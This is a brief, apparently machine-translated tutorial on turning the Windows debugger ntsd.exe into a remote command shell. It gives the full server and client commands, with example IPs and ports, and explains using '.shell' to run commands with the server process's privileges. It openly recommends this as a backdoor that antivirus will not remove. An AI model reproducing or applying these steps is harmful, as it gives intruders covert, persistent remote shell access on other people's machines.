1. remote Terminal: ntsd-server tcp: port = program to be debugged on the port (can be any program, as long as it exists), for example: ntsd-server tcp: port = 99 calc.exe, A window will pop up and listen to the configured port.
2. Local running: ntsd-remote tcp: server = IP, port = port, for example: ntsd-remote tcp: server = 192.168.1.1, port = 99. A window is displayed. If the parameter is set correctly, the target machine will be connected, and the prompt-like interface will be displayed. At the same time, the server side (the one listened to in the first step) will display: 0: 000> COMPUTERetbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011, indicating that someone is connected. The connected machine name, user name, connection type, IP address, and port are also displayed, time and other information.
3. Enter. shell to get the permissions of running ntsd.exe on the service end.
It is also a good way to keep a backdoor. It is completely free from being killed and never killed ......
This is actually a normal function of NTSD.exe, remote debugging function, more instructions Google search, This is a debugging tool under the windows command line, the function is very powerful.